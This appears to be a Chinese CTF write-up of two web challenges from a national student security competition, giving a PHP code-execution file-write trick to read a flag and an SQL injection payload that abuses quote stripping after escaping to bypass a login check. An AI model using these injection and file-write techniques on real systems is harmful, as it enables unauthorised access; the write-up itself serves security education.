第十届全国大学生信息安全竞赛 部分web-writeup

上周末打了第十届全国大学生信息安全竞赛,题目是不错的,但是这个比赛某些方面十分的神奇,呵呵~
这边记录一下自己做出来的两道web题(太菜了)
ven师傅的wp:http://www.venenof.com/index.php/archives/386/
土师傅的wp:http://lorexxar.cn/2017/07/11/guosai2017/
柠檬师傅的wp:http://www.cnblogs.com/iamstudy/articles/2017_quanguo_ctf_web_writeup.html

php exercise

php代码执行
我的方法:print_r(scandir(‘./‘))列文件,file_put_contents(“121.php”,”<?php include ‘flag.php’; echo $flag;?>”),用bp的intruder维持121.php的文件内容(智商太低)
其他方法:print_r(glob(‘./f*’))列文件,show_source读文件内容

wanna to see your hat?

抓包可以看到select count(*) from t_info where username = 'aaa' or nickname = 'aaa'
发现.svn泄漏
审计一波,关键点在:

if(isset($_SESSION['hat'])){
if($_SESSION['hat']=='green'){
output("<img src='green-hat-1.jpg'>",10);
}else{
output("<img src='black-fedora.jpg'>",1);
echo $flag;
}

在login.php中设置session:

if (isset($_POST["name"])){

$name = str_replace(“‘“, “”, trim(waf($_POST[“name”])));
if (strlen($name) > 11){
echo(“<script>alert(‘name too long’)</script>”);
}else{
$sql = “select count(*) from t_info where username = ‘$name’ or nickname = ‘$name’”;
echo $sql;
$result = mysql_query($sql);
$row = mysql_fetch_array($result);
if ($row[0]){
$_SESSION[‘hat’] = ‘black’;
echo ‘good job’;
}else{
$_SESSION[‘hat’] = ‘green’;
}
header(“Location: index.php”);
}

}

其中有这么一句话:$name = str_replace("'", "", trim(waf($_POST["name"])));
意味着addslashes转义后的单引号会被吃掉,可以利用这个将sql语句中原本的单引号吃掉
payload:select count(*) from t_info where username = 'or(1=1)#\' or nickname = 'or(1=1)#\'